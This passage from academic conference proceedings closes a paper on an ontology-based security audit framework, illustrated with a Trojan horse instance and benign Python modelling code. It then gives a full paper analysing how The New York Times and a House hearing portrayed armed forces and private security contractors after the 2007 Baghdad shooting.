Figure 3: Hierarchical structure of the concept attack (for additional details see (Pereira & Santos 2010a))
As was demonstrated in the ontology, each concept is mapped to real subjects. An instance of this logical structure can start, for example, with one instance of an attack, followed by the available connection/link to the assets affected by the attack, the vulnerability it exploits, and the security properties that have been compromised. Instances of these concepts are presented below:
Attack – a Trojan horse.
Vulnerability – Flaws in the web browser; the e-mail attachment mechanism; file download applications. As Trojans are executable programs, when the user opens an e-mail attachment or a downloaded file, the Trojan is installed in the background. Trojan installers can also be automatically downloaded as ActiveX controls or other malicious content when the user visits malicious web sites.
Assets – User's computer; private data.
CIA – Confidentiality and integrity.
Threat – Modification.
Controls – A list of mechanisms used to detect a Trojan is presented below:
Installation of anti-virus software. Antivirus programs make it possible to catch some of the most popular malware.
Installation of anti-Trojan software. Antivirus software is not effective against some Trojans.
Addition of a firewall.
Blocking executable files from e-mail.
Alerting the user never to type commands that others tell them to type, go to web addresses mentioned by strangers, or run pre-fabricated programs or scripts (not even popular ones).
The standard, and consequently the ontology, do not go into fine-grained details concerning the characterization of concepts when different views are possible. Currently attacks, vulnerabilities and controls are often described differently by different organizations. Each of these concepts is therefore associated with a taxonomy aimed at classifying security attacks, vulnerabilities and controls, and providing a structured way of viewing them. For attacks the Bishop taxonomy (Bishop 2004) is used, for vulnerabilities the CVE (Common Vulnerabilities and Exposures 4) taxonomy is used and for controls the taxonomy presented in the security standard ISO/IEC FDIS 27001:2005(E) (ISO/IEC_JTC1 2005) is used. The use of taxonomies makes it possible to achieve a better and uniform characterization of each instance, taking into account different views, purposes or even perceptions. However, there is nothing limiting the possibility of extending concept classes, for instance defining attack classes with common characteristics, all deriving from the same main fundamental class. This is demonstrated in the framework and illustrated in Figure 4 and Figure 5. This feature gives the possibility of customization, but with the risk of loss of generalization if not used carefully.
Despite the large amount of information available to complete a basic ontology, we accept that each organization will develop its own view of security awareness. The framework is modular in this respect, allowing the ontology to evolve by adding the relevant subjects. This way, the auditor may proceed through the examination of the relevant vulnerabilities in the assets that can compromise the security of the information system within the organization; or the auditor may go along with the analysis of new threats that might materialize in an attack.
Additionally, the proposed framework includes the typical functions of similar tools, enabling a set of functionalities, such as the possibility for the auditor to generate a report with all the steps performed, as well as the registration date of the audit. According to the results of the auditor's examinations, he can also schedule the next audit in the calendar. Moreover, if the auditor during his examination detects a new incident, i.e. an attack that is not present on the list of attacks, the auditor should report this new attack with its features, which will be validated by the administrator of the framework and, after that, the administrator will index the attack in the list of attacks. This procedure is the same if the auditor decides to conduct the audit through the examination of the assets or threats and during the process identifies a new vulnerability in an asset or a new threat.
4 http://cve.mitre.org/
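The Trojan horse instance above and the report, validate and index procedure, as an added example rather than the authors' framework code: the concept kinds, the instance and the three taxonomies come from the paper, while the data structures, the link walk from a chosen concept, the pending queue and the scheduling rule are assumptions made for illustration.

```python
from dataclasses import dataclass, field
from datetime import date, timedelta


@dataclass
class Concept:
    """One node of the ontology: its kind (attack, vulnerability, asset, property,
    threat or control), its name, the taxonomy class it is filed under, and the
    names of the directly related concepts, keyed by their kind."""
    kind: str
    name: str
    taxonomy: str = ""
    links: dict = field(default_factory=dict)


class Ontology:
    """Validated concepts, plus the queue of instances reported by auditors that
    the framework administrator has not yet validated and indexed (assumed design)."""

    def __init__(self):
        self.concepts = {}
        self.pending = []

    def add(self, concept):
        self.concepts[(concept.kind, concept.name)] = concept
        return concept

    def link(self, a, b):
        # Links are bidirectional, so the auditor can start from any concept
        # and proceed to the directly related ones.
        a.links.setdefault(b.kind, []).append(b.name)
        b.links.setdefault(a.kind, []).append(a.name)

    def report_new(self, concept):
        # An attack, vulnerability or threat not yet on the list is reported
        # with its features; it is not indexed until the administrator validates it.
        self.pending.append(concept)

    def validate(self, kind, name):
        # The administrator validates a reported instance and indexes it.
        for c in self.pending:
            if c.kind == kind and c.name == name:
                self.pending.remove(c)
                return self.add(c)
        return None


def build_trojan_instance():
    """The worked instance from the paper: a Trojan horse attack linked to the
    vulnerabilities, assets, security properties, threat and controls listed."""
    ont = Ontology()
    attack = ont.add(Concept("attack", "Trojan horse", "Bishop taxonomy"))
    related = [ont.add(Concept("vulnerability", v, "CVE")) for v in (
        "flaws in the web browser",
        "e-mail attachment mechanism",
        "file download applications")]
    related += [ont.add(Concept("asset", a)) for a in ("user's computer", "private data")]
    related += [ont.add(Concept("property", p)) for p in ("confidentiality", "integrity")]
    related.append(ont.add(Concept("threat", "modification")))
    related += [ont.add(Concept("control", c, "ISO/IEC 27001")) for c in (
        "anti-virus software",
        "anti-Trojan software",
        "firewall",
        "block executable files from e-mail",
        "user awareness")]
    for c in related:
        ont.link(attack, c)
    return ont


def audit_from(ont, kind, name, when):
    """Start the audit at one concept, walk its direct links and return the
    report steps, the first of which records the registration date."""
    start = ont.concepts[(kind, name)]
    steps = [f"{when.isoformat()} audit started from {kind}: {name}"]
    for related_kind, names in sorted(start.links.items()):
        steps.append(f"{related_kind}: " + "; ".join(names))
    return steps


def schedule_next_audit(when, controls_effective):
    # Assumed scheduling rule (not from the paper): re-audit sooner when the
    # examined controls were found ineffective.
    return when + timedelta(days=90 if controls_effective else 30)


if __name__ == "__main__":
    ont = build_trojan_instance()
    print("\n".join(audit_from(ont, "attack", "Trojan horse", date(2011, 7, 7))))
    # Constructed placeholder for an attack the auditor found missing from the list.
    ont.report_new(Concept("attack", "example new attack", "Bishop taxonomy"))
    print("pending:", [c.name for c in ont.pending])
    ont.validate("attack", "example new attack")
    print("indexed:", ("attack", "example new attack") in ont.concepts)
    print("next audit:", schedule_next_audit(date(2011, 7, 7), controls_effective=False))
```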
Figure 4: An instance of the concept attack
Figure 5: An instance of the concept attack related to the asset concept
The key role of this framework is to assist the auditing process and promote improvements to the current methodologies available for information security management.
5. Comparison of COBIT, ITIL and the Developed Framework
The general functions of COBIT, ITIL and the developed framework differ in several aspects. The main differences between the three approaches are presented below:
COBIT focuses on control objectives and IT metrics, while ITIL aims to map IT service level management. The developed framework is focused on the general security domain.
COBIT creates documents of the processes and operations, and ITIL's key rule is continual improvement. The developed framework enforces continual improvement as well, and it also enables new security content to be added to the security management process.
The COBIT Audit Guidelines provide a complex structure for auditing and assessing controls, and ITIL is based on best practices for management and to support services. The developed framework provides a security model based on security standards (ISO/IEC_JTC1).
COBIT Audit Guidelines and ITIL best practices are "one-size-fits-all" solutions. The developed framework provides a base model, which evolves with the organization's business requirements, and promotes the sharing of security context since it follows an ontological approach.
6. Conclusions and future work
The information system security audit is not (or should not be) a one-time task, but a continual effort to improve the protection of the organization's assets and consequently to assure the normal functioning of the organization's activity. Regular audits should be planned to analyze the effectiveness of the security policies, practices, measures and procedures implemented within the context of the organization's structure, objectives, activities and its particular view of risks. As a result, the auditor should conduct his tasks according to his experience and through the use of available frameworks that assist the auditor in performing his work. COBIT and ITIL are currently widely used frameworks in several organizations. However, they are very different in their orientation, definition and the class of problems they address, and in the specific implications regarding implementation.
In this paper, we presented these two standards and established a comparison between them and the developed framework, which is based on a conceptual model approach, to support the auditor conducting an information system security audit within the context of a given organization. This solution introduces a new perspective to model information in the security domain and has some advantages over the COBIT and ITIL solutions. It enables the description of the data semantics and promotes firming up and unifying the concepts and terminology defined in the scope of information security, based on the relevant ISO/IEC_JTC1 standards. Furthermore, it enables an organization to evolve its own instantiation of the security ontology, obeying standard concepts but embedding its own view and assumed risk exposure.
As future work we intend to implement the necessary adjustments to integrate further functionalities, e.g., a direct link to attack and vulnerability description databases, an alert mechanism for an outdated ontology, and continuous monitoring of security controls to promote early detection of security policy breaches.
References
Bishop, M., 2004. Introduction to computer security, Addison-Wesley Professional.
ISO/IEC_JTC1, 2005. ISO/IEC FDIS 27001 Information Technology - Security Techniques - Information Security Management Systems - Requirements, Geneva, Switzerland: ISO copyright office.
ITGI, 2000. CobiT Audit Guidelines. Available at: http://techtraining.brevard.k12.fl.us/BETC2007/Grachis-Auditguidelines.pdf.
ITIL, 2007. An Introductory Overview of ITIL V3. London: The UK Chapter of the itSMF.
Pereira, T. & Santos, H., 2010a. A conceptual model approach to manage and audit information systems security. 9th European Conference on Information Warfare and Security. Thessaloniki, Greece: Josef Demergis, University of Macedonia Thessaloniki Greece, pp. 360-366. Available at: http://academicconferences.org/eciw/eciw2011/eciw10-proceedings.htm.
Pereira, T. & Santos, H., 2010b. A Security Audit Framework to Manage Information System Security. In 6th International Conference, ICGS3 2010. Global Security, Safety, and Sustainability. Communications in Computer and Information Science, 2010. Braga, Portugal: SpringerLink, pp. 9-18. Available at: http://www.springerlink.com/content/gx40481t26025266/.
Woods, T., 2010. Data Storage Management. Implementing ITIL: Getting started with ITIL V3 service management. SearchStorage.com.
Fight Over Images of the State Armed Forces and Private Security Contractors
Mirva Salminen
University of Lapland, Finland
msalmine@ulapland.fi
Abstract: Images of participants in conflicts held by military leaders, top politicians and administrators as well as the general public make a difference both in conflicts and in times of peace. The images do not only have practical implications in warfare, but also far-reaching influence on people's shared understanding. The shared understanding, again, is the arena on which suggested truths are either accepted or rejected and therefore an arena for power struggles. Production of and control over the emergence, existence and disappearance of different images of participants in conflicts have hence become goals of information warfare. The topic of this paper is the images produced firstly, of soldiers of the state armed forces and secondly, of employees of Private Security Contractors (PSCs). The production of these images is carried out both in discursive and non-discursive practices. This paper focuses on the discursive production of the images with the help of descriptions given and pictures presented of the participants in conflicts. The two aforementioned imageries are examined for the reason that in the shared understanding they serve as a binary category: the armed forces function as a norm against which the existence and conduct of private security contractors are evaluated. The data of the study consists of writings and pictures published in The New York Times (NYT) after a shooting in Baghdad in September 2007 and commenting on the shooting. In addition, the paper examines the discussion in the US House of Representatives Committee on Oversight and Government Reform (HCOGR) hearing held on the 2nd of October 2007, which discussed the matter of PSCs operating in Iraq and in which the CEO of the company accused of misconduct in relation to the aforementioned shooting testified. The questions under scrutiny are who has the right to speak and what kinds of images circulate in the data, as well as how these images produce the binary category of the armed forces – private security contractors in the shared understanding. The role of PSCs is likely to grow in the complicated conflicts of the future and therefore, how political and military decision making and people's shared understanding manage them is important.
Keywords: images, collective meaning production, armed forces, private security contractors
1. Introduction
In the course of the war in Iraq, the American people were introduced to private security contractors. Repeated pieces of news describing scandals in which PSCs and their employees were entangled produced PSCs as participants in conflicts in people's shared understanding. The fact that security contractors were mainly produced in the context of scandals framed them as primarily negative and avoidable actors. However, at the same time another line of descriptions circulated in the discussion. According to this line, PSCs should be given credit for the work they do, and the protection they provide to US state officials and dignitaries working in or visiting Iraq should be recognised. Hence, PSCs and their employees should rather be seen positively as "[...] our team working in [...] a war zone (Turner, HCOGR 2007, 83)".
How the general American public perceives security contractors is important, because those perceptions create the space, as well as the limits of that space, within which political, administrative and military decisions concerning PSCs can be made. In an ideal, transparent democracy an illegitimate decision that would hold for long cannot be made and therefore, people's perceptions and their accordance with the deliveries of public decision making are valued. However, alongside fine-tuning decisions to follow perceptions, people's shared understanding is an arena for power struggles over generally accepted or acceptable truths about PSCs. Simultaneously, information warfare is the practice utilised to construct those truths, and images are the means for waging that war. This can be seen as an aspect of the war in Iraq in which warfare is understood as a fight over the production of and control over images (Rantapelkonen 2008, 65; 82).
Fighting over images of PSCs operating in Iraq intensified after a shooting incident in Baghdad on September 16th, 2007. Recourse to violence by a team of PSC employees that led to the killing of seventeen Iraqis served as an acceleration point for multiple information operations aimed at influencing the American public and thus, either at legitimising or outlawing the use of security contractors in conflict zones. In these operations, images of the state armed forces were used as a norm against which PSCs' and their employees' conduct was evaluated. The commonly suggested image of the armed forces was that of a patriotic and righteous state agency executing a policy that furthered American interests abroad. In these descriptions soldiers were under direct state control and therefore, their actions could be trusted to be in the best interest of the United States – unlike PSC actions seemed to be. The September 16th shooting and the discussion related to it became important because of the number of casualties, of strong Iraqi expressions of anger and of claims that similar PSC behaviour was frequent. Moreover, the incident forced the US administration to revise its contracting and supervising practices and is still often referred to in the contemporary discussion. Thus, it can be argued that the shooting has importantly framed the overall discussion on private security contractors.
As this paper does not examine the perceptions that the American people hold of PSCs, but the information operations aimed at influencing those perceptions, it concentrates on studying articles, columns and editorials published in The New York Times from September 18th, 2007 to October 3rd, 2007, as well as the discussion in the House Committee hearing on PSCs, which was widely commented on in the newspaper on the last day of the examined time period. This data was selected because of the particular position given in the shared understanding to news media as neutral speakers of truth. News media are not the only channel through which information is disseminated. However, information presented, for example, in newspapers is believed to have gone through intense processes of verification before publishing and is hence read as true (Ridell 1994, 26-29). The New York Times particularly holds this kind of appreciated position as an information funnel - not only in the United States, but more widely in the world. For similar reasons the congressional hearing was included in the data. Politicians in powerful positions do not only form part of the people whose shared understanding is influenced, but also act as information funnels. Due to their privileged position they are believed to have superior knowledge of important issues and therefore, what they say is worth reporting in itself. In this way, congressmen's perceptions become repeated in the media, which increases their truth value. (Kunelius et al. 2009, 33-34, 315-326.)
2. Research and paper design
Before going into details about how the study of images and their use is conducted in the paper, some central concepts are in need of clarification. Firstly, information warfare is understood as a broad category of practices utilised to manage the flow of information - including the practices used to generate information as well as to degenerate and deprive information - and thus, to manage the emergence, existence and disappearance of different images from the shared understanding (Rantapelkonen 2008, 72; Foucault 2009, 42). In other words, information warfare is approached as a combination of practices aimed at turning information into knowledge and thus, constituting truths about private security contractors (see Huhtinen & Rantapelkonen 2002, 24-28). Secondly, what is meant by images are understandings produced by the use of discursive formations and pictures, and which are propagated as truths. Discursive formations, again, are systems of dispersion which separate and relate statements to one another into meaning-producing sets, that is, images. They are recognisable through the succession and co-existence of statements in them as well as through intervening processes that change them. In other words, a certain set of rules binds the production of images and creates meanings in them. (Foucault 2009, 37-41; 62-66.)
This paper examines the aforementioned images and the fight in which discussants position those images against each other. The examination begins with recognising the discussants that have the right to attend the discussion about security contractors. Not everyone can be heard in the discussion, but only those who occupy an acknowledged speaker's position can have their say. (Foucault 1998, 11.)
The study then moves on to presenting the imagery of both the state armed forces and PSCs. Through close reading of the data, typologies of images were produced. In this process, it soon became clear that regardless of whether the images of PSCs and their employees were negative or positive, they were relative to and dependent on the images of the armed forces. For the discussants PSCs do not have an independent existence, but they are to be defined in relation to the state armed forces. Even statements such as "[...] we are not talking about the military here at all [...] (Issa, HCOGR 2007, 86)" still require an image of the armed forces in order to be meaningful. Pictures are seen as part of the discourse and as either supporting or challenging the discursive descriptions (see Rose 2001, 136-138). Therefore, their analysis is tied to the analysis of verbal descriptions.
The paper finishes with presenting observations about the durability of the examined images, the future of newspapers as information funnels, which has been challenged by the rise of more participatory media, and the solidity of the binary category in non-state-related discussions on PSCs.
3. The discussants
The speaker's positions recognised in the newspaper and in the House Committee hearing are similar. Plenty of audible room is given to the representatives of both the US and Iraqi governments and administrations. These discussants have been granted the authoritative right to comment on the September 16th shooting, although their speaker's positions are not similar. The US representatives, who represent the agencies using PSC services, are seen to have inside information and knowledge about contracting and contractors. They are granted the authority to inform the American people about the shooting and its investigations. The Iraqi representatives, who speak for the people who are directly affected by PSC actions, are given the role of representatives of the victims who demand their rights. They can also provide information on the shooting and are allowed to bring accusations of PSC misconduct onto the discussion agenda as well as to claim respect for Iraq's self-determination. (Salminen 2010, 82-83.)
The New York Times itself acts as a discussant when it publishes news articles, columns and editorials commenting on the shooting and on the whole issue of private security contractors (Salminen 2010, 24-25). More accurately, the newspaper's reporters act as discussants. They have been granted their speaker's positions as representatives of the media who have the right to inform people. Voices of the victims and bystander witnesses of alleged misconduct, both Iraqi and American, can also be heard in the discussion. They may not directly attend the discussion, but can have their say in newspaper interviews, in interviews conducted during the compilation of governmental reports or in letters put in front of the House Committee hearing as pieces of evidence. These victims and bystanders are given the right to speak because of their personal experiences of the contractors' conduct. Experience can also serve as justification for an expert to be given the floor in the discussion. Therefore, statements of numerous anonymous "contracting officials" or "representatives of the contracting industry" appear in the discussion. An expert can also gain a speaker's position because of his long engagement in the study of warfare and conflicts or of governmental outsourcing. (Salminen 2010, 147.)
A particular form of expert knowledge, and speaker's positions based on that knowledge, are the positions held by representatives of PSCs and of the state armed forces. Blackwater, the contractor involved in the shooting, speaks primarily through its spokeswoman and statements released from the company's headquarters, but when the company's CEO was asked to appear in the House Committee hearing his statements became prospective sources of truth as well. The CEO's expertise was not acknowledged only because he was the CEO, but also because he was a former member of the US Navy's special operations force who after his military career had founded Blackwater. In the hearing he was thanked for his military service and it was widely presumed that the experience he gained in the armed forces had facilitated his later activities (Welch, HCOGR 2007, 108). In other words, the CEO's credibility as a source of truth claims was dependent on his military experience. This is an example of the practices through which the binary category, the armed forces – security contractors, has been established.
The speaker's position of members of the state armed forces is based on expertise that they have gained while serving in the institution responsible for US military and security operations. The armed forces are believed to have the best knowledge of the overall situation in Iraq as well as of the conduct of military-like security operations. Therefore, they are even expected to comment on PSC issues and are listened to very carefully when they do so. Even when it is recognised that the armed forces do not have the training or willingness to take over tasks allocated to PSCs, they are demanded to do so or at least, to expand their control and oversight to PSCs working for all US state agencies (Watson, HCOGR 2007, 85‒86; NYT editorial, 01.10.2007). This is another example of how the aforementioned binary category is produced.
4. Imagery of members of the state armed forces and of security contractor employees
4.1 Typologies of discursive descriptions
Descriptions given of members of the state armed forces in the data are straightforward. Soldiers fighting for the United States, firstly, were in Iraq voluntarily and were making great sacrifices. They were described as patriotic people, whose "[...] pay [did] not reflect their value, but [who did not] complain [...] (Waxman, HCOGR 2007, 3)" and who followed the orders given to them without question. In these descriptions, soldiers may also die, albeit the war is expected to be waged in a manner which optimises force protection. Secondly, the United States was acknowledged to "[...] have the best troops in the world (Waxman 2007, 2)"; capable of anything, if they only had the right training and equipment as well as enough personnel. This was accepted as an unquestionable fact in the discussion. In addition, they came from several ethnic and educational backgrounds, which only enhanced their abilities (Platts, HCOGR 2007, 83-84). Even the Blackwater CEO agreed with this fact and declared his employees to be a supplement to the US military, filling in "a specialty gap" (Prince, HCOGR 2007, 85-86). In relation to this, thirdly, the state armed forces were acknowledged as not being capable or willing to do everything. Soldiers had not been trained for everything and it was not even meaningful for them to perform all tasks. Fourthly, the US soldiers were described as being humane, that is, willing to help the Iraqis and to take their concerns into consideration (NYT 22.09.2007).
Fifthly, members of the armed forces appeared in the roles of incident investigators and of the highest security authorities in Iraq. What soldiers stated about circumstances and trajectories was accepted as true. Thus, there appears to be conflict over soldiers' statements as well. The New York Times quoted negative statements about PSCs provided by members of the armed forces (NYT 28.09.2007b), as did the speakers in the House Committee hearing (Waxman 2007, 73-74). In response, the Blackwater CEO told in the hearing a story about a colonel thanking him for having his employees in Iraq to safeguard soldiers' backs (Prince 2007, 74). In relation to this, sixthly, the armed forces were seen as the agency which would have to take care of all tasks in conflict zones in case no other actor was available (NYT 20.09.2007b). They functioned as the US backbone and therefore, their capabilities and resources should not be reduced due to the outsourcing of the state's military and security related tasks. Moreover, it was suggested that the armed forces should perform PSCs' tasks, because these tasks were integral to the overall operation in Iraq and to US foreign policy, and because there were procedures to keep members of the armed forces accountable and responsible - unlike PSCs (Tierney, HCOGR 2007, 79).
As can be seen from the descriptions above, images of the state armed forces are primarily positive. On the contrary, the dominating images of PSCs and their employees are negative, although contested. As PSC images are more numerous and varying than those of the armed forces, their prime types are presented in the following Table 1.
Table 1: Prime types of discursive descriptions of private security contractors
Primarily negative images: war profiteers; secretive, murky businesses (special form: political pets); abusers of the armed forces; risks or dangers; entities above law (sub-categories: criminals; mercenaries); reckless cowboys; unqualified amateurs; abusers of their employees; enemies of the Iraqis
Central column (negative or positive depending on context): private companies; representatives of USA; civilians
Primarily positive images: protectors; a good deal; part of the nation's total force; patriots; necessities; entities under state control; highly-trained professionals
The above presented typology is not exhaustive. Speakers often combined statements that position PSCs in several of the aforementioned images, and hence providing a straightforward typology is impossible. Thus, the aforementioned images are relational and dependent on each other rather than excluding one another. In addition, sometimes positive sides of a negative image were recognised; for example, when it was negatively claimed that PSCs lure active members away from the state armed forces, it was also positively recognised that prior military experience enhanced the skills of PSC employees (Clay, HCOGR 2007, 82; NYT 20.09.2007b). On the other hand, negative sides of a positive image were recognised, when PSCs were acknowledged as safeguarding US representatives in conflict zones, but also said to endanger the lives of Iraqi bystanders (NYT 18.09.2007; 19.09.2007). Of the images listed in the central column of Table 1, "private companies", "representatives of USA" and "civilians" are not negative or positive per se, but depending on the context can be both. "Criminals" and "mercenaries" are listed as sub-categories of "entities above law", and "political pets" are a special form of the image of "secretive, murky businesses".
As said, the main tone of the discursive descriptions was, quantitatively, negative. PSCs were claimed to benefit disproportionately from the war thanks to their political connections, at the expense of their own employees, of the armed forces and of US taxpayers. In addition, political affiliations enabled the US administration to wage an unpopular war without the support of the American people, that is, undemocratically (Kucinich, HCOGR 2007, 65-66; Yarmuth, HCOGR 2007, 88-89; NYT 28.09.2007a). In this way, the administration was betraying the principles on which the United States had been built and deteriorating the moral stance of the state (see Harle 2000, 81-83). In addition, and unlike the armed forces, PSCs were claimed to serve primarily the profit motive instead of US interests (Tierney 2007, 77).
In counter-arguments, PSC employees were presented as proud and dedicated Americans who, after having served in the armed forces, continued their service while working for PSCs. PSCs, for their part, were associated with the United States and could not operate against US interests because of existing legal restrictions (Prince 2007, 100). In further counter-arguments it was stated that a large proportion of PSC employees were not Americans and thus, amongst other things, fulfilled the definition of mercenaries (Norton, HCOGR 2007, 118). Mercenary claims appeared only in The New York Times columns and editorials, not in the news articles, and in the House Committee hearing the concept was referred to fewer than ten times. Unsurprisingly, representatives of PSCs and of their customers fiercely denied the applicability of the mercenary claim.
In the discussion, private security providers were often alleged to be risky or dangerous. Numerous moral, economic, political, military and security concerns were attached to them. Most importantly, PSCs were regarded as not being under any legislation: they had been exempted from Iraqi law, and neither US civilian nor military law had been applied to them in practice. The preferred legislation to be extended to PSCs and their employees was US military legislation (Krugman 28.09.2007; NYT 20.09.2007b; 27.09.2007). Not only concerned politicians and experts held that opinion, but representatives of PSCs as well. This, again, is one of the ways in which PSCs emerge in relation to the state armed forces. However, this claim raised some problems. Firstly, some PSCs and their employees operated in a civilian capacity, not a military one, and it was asked whether civilians could be held responsible under military jurisdiction (McCollum, HCOGR 2007, 97). Secondly, representatives of the Iraqi administration preferred PSCs to be brought under Iraq’s legislation, which the Americans opposed (NYT 23.09.2007).
PSCs and their employees were not only seen as being above the law, behaving accordingly and thus endangering innocent Iraqi lives (NYT 19.09.2007; 20.09.2007a). They were also accused of not being properly screened or supervised. Along with the lawlessness claim, this was the main concern in the discussion, and it was expressed in several ways. The allegation was contested by statements testifying to strict intra-company qualification requirements and to those of the customer, that is, of the US state agencies (Davis 2007, 14; Prince 2007, 94). In addition, PSCs and their employees were recognised as representing the United States to the Iraqi people and therefore, through unprofessional and reckless conduct, as endangering US foreign policy (NYT 27.09.2007). The same claim was also presented in a positive light when legitimisation was sought for contractors by recognising them as part of the overall US force in Iraq: with their extensive experience and specialised skills, PSC employees were contributing to the overall force.
Regardless of the quantitative domination of negative images, strong positive ones stood against them. Some of these positive images have been presented above. In addition, PSCs were presented in the discussion as effective and efficient, even heroic, protectors: none of their principals had been killed or seriously injured in Iraq, while many PSC employees had lost their lives in their work (Shays, HCOGR 2007, 68). Outsourced security services were also seen as a good deal for the US administration, because soldiers were thereby released from secondary tasks to fight the war and because PSCs were providing those secondary tasks in a cost-efficient and flexible manner (Prince 2007, 23-24). However, the latter claim was often challenged with accusations of over-billing (Duncan, HCOGR 2007, 80; NYT 02.10.2007). The necessity of PSCs in conflict zones was also acknowledged in the discussion, when it was stated that current US military and security operations could not be conducted without contractors. The prime counter-argument was that it was not good policy to be dependent on contractors in military operations or in foreign policy (NYT 24.09.2007; 03.10.2007a).
4.2 How are the descriptions supported with pictures?
There are eight pictures directly attached to news articles published on The New York Times pages. Of these only one actually presents PSC employees (18.09.2007). It was published alongside the first news article presenting the shooting and thus also visually introduced private security providers to the readers of the newspaper. In the picture, two heavily armed men who are not wearing uniforms move around an armed vehicle. A third, similarly equipped man occupies the shooter’s position inside the vehicle. From the surroundings it can be concluded that they are on a street inside the housed quarters of some non-Western town. The visual similarities between the appearance and equipment of the men in the picture and those of soldiers are striking. No wonder, then, that in the discussion it was claimed that the Iraqi people do not differentiate between US soldiers and PSC employees (Cummings, HCOGR 2007, 61).
In addition, there are four pictures of the incident scene or of the consequences of the shooting (21.09.2007; 28.09.2007b; 03.10.2007b), two facial close-ups of the Blackwater CEO (27.09.2007; 03.10.2007a) and a picture of Iraq’s prime minister speaking while standing next to a flag of Iraq (24.09.2007). The incident scene pictures are used to visualise the course of events on September 16th or to bear witness to the horrendous impact that the force used on that day had on its targets. In the latter case, the main role is given to a charred white car at which Blackwater employees had directed a series of shots. The pictures of the Blackwater CEO are used to give a face to the company: in the shared understanding, a PSC is a relatively abstract entity, which becomes more tangible when personified in its CEO. The picture of the Iraqi prime minister is published next to a news article telling how the prime minister had claimed that PSCs challenge the sovereignty of Iraq, and it thus reinforces the message delivered in the article.
5. Conclusion
This paper has presented the discussants allowed to take part in the discussion on private security contractors on the pages of The New York Times and in the House Committee hearing. It has also presented the imageries of the state armed forces and of PSCs which are utilised in producing PSCs into the American shared understanding by establishing a binary category with the armed forces. It has to be noted that most of the images presented here are not specific to the discussion about the September 16th shooting but existed before it and have persisted since. Neither are they specific to the media examined; they are present, for example, in academic texts and blogs as well as on discussion boards on the internet. However, the framing of the topic varies according to the medium, as does the acceptance of discussants, and more research on these matters is required.
While the emergence of more participatory media has changed and keeps on changing knowledge production practices, newspapers and other news media are likely to preserve their position as information funnels. Topics and images rise onto the discussion agenda from more varied sources than news reports alone and are kept there by a number of actors, which has made the successful conduct of information operations difficult. The practices of news media duplicate the suggested images and thus increase their truth value. This has intensified power struggles over the production of knowledge on PSCs. Currently there seems to be no unanimity on the images, only on the point that security contractors need to be brought under better state supervision. In addition, it is improbable that the practice of producing PSCs into the shared understanding mainly through scandals will change, regardless of the source of the truth claims.
With regard to private security contractors, one of the most successful practices used in information management has been the withholding of information. As the discussion related to the September 16th shooting testified, the US administration had not been keeping proper records of PSCs and their operations, let alone publishing them. It also required that security contractors abstain from commenting publicly on incidents. However, congressional and public demands for openness pressured the administration to re-evaluate its practices and made more information available. The rising awareness has also meant that PSCs are required to be better included in decision making. The binary category of the armed forces versus private security contractors is likely to remain strong in state-related discussion on PSCs, but as state agencies are not the only customers of PSCs, it would be interesting to test the solidity of the category in discussions on PSCs hired by, for example, private aid agencies or multinational corporations operating in conflict zones. However, finding relevant information about such contracts is difficult.
References
Foucault, M. (1998) The Will to Knowledge. The History of Sexuality: Volume One, Penguin Books, London.
Foucault, M. (2009) The Archeology of Knowledge, Routledge, Abingdon.
Harle, V. (2000) The Enemy with a Thousand Faces. The Tradition of the Other in Western Political Thought and History, Praeger, Westport.
Huhtinen, A. and Rantapelkonen, J. (2002) Image Wars. Beyond the Mask on Information Warfare, Marshal of Finland Mannerheim’s War Studies Fund, Saarijärvi.
Kunelius, R.; Noppari, E. and Reunanen, E. (2009) Median vallan verkoissa. University of Tampere, Tampere.
Rantapelkonen, J. (2008) ”Informaatiosodan monet kasvot” in Raitasalo, J. and Sipilä, J. (eds.), Sota - Teoria ja todellisuus. Näkökulmia sodan muutokseen, Finnish National Defence University, Department of Strategic and Defence Studies, Helsinki. Series 1:24, pp. 63-87.
Ridell, S. (1994) Kaikki tiet vievät genreen: tutkimusretkiä tiedotusopin ja kirjallisuustieteen rajamaastossa. University of Tampere, Tampere.
Rose, G. (2001) Visual Methodologies: An Introduction to the Interpretation of Visual Materials, Sage Publications Inc, London.
Salminen, M. (2010) Struggle over outsourcing of the security functions of the state: The case of September 16, 2007 shooting in Baghdad, M.Soc.Sc. thesis, University of Tampere, Tampere.
The New York Times, news article: “U.S. Contractor Banned by Iraq over Shootings”, 18.09.2007.
The New York Times, news article: “Iraqi Report Says Guards for Blackwater Fired First”, 19.09.2007.
The New York Times, news article: “Maliki Alleges 7 Cases When Blackwater Killed Iraqis”, 20.09.2007a.
The New York Times, news article: “Armed Guards in Iraq Occupy a Legal Limbo”, 20.09.2007b.
The New York Times, news article: “Guards’ Shots Not Provoked, Iraq Concludes”, 21.09.2007.
The New York Times, news article: “Blackwater Resumes Guarding U.S. Envoys in Iraq”, 22.09.2007.
The New York Times, news article: “Security Firm Faces Criminal Charges in Iraq”, 23.09.2007.
The New York Times, news article: “Iraqi Premier Says Blackwater Shootings Challenge His Nation’s Sovereignty”, 24.09.2007.
The New York Times, news article: “House Panel and State Dept. Clash on Blackwater Inquiry”, 26.09.2007a.
The New York Times, news article: “Iraq Drafts Law on Security Companies”, 26.09.2006b.
The New York Times, news article: “Blackwater Tops All Firms in Iraq in Shooting Rate”, 27.09.2007.
The New York Times, news article: “State Dept. Tallies 56 Shootings Involving Blackwater on Diplomatic Guard Duty”, 28.09.2007a.
The New York Times, news article: “Blackwater Role in Shooting Said to Include Chaos”, 28.09.2007b.
The New York Times, news article: “State Dept. Starts Third Review on Private Security in Iraq”, 29.09.2007.
The New York Times, news article: “Report Says Firm Tried Cover-ups After Shootings”, 02.10.2007.
The New York Times, news article: “Chief of Blackwater Defends His Employees”, 03.10.2007a.
The New York Times, news article: “From Errand to Fatal Shot to Hail of Fire to 17 Deaths”, 03.10.2007b.
The New York Times, op-ed columnists
The New York Times, op-ed column: “Hired Gun Fetish”, Paul Krugman, 28.09.2007.
The New York Times, op-ed column: “Sinking in a Swamp Full of Blackwater”, Maureen Dowd, 03.10.2007.
The New York Times, editorials
The New York Times, editorial: “Subcontracting the War”, 01.10.2007.
The New York Times, editorial: “Blackwater’s Rich Contracts”, 03.10.2007.
Non Academic Papers
A Proposal for Domain Name System (DNS) Security Metrics Framework
Andrea Rigoni and Salvatore Di Blasi
Global Cyber Security Center, Rome, Italy
andrea.rigoni@gcsec.org
salvatore.diblasi@gcsec.org
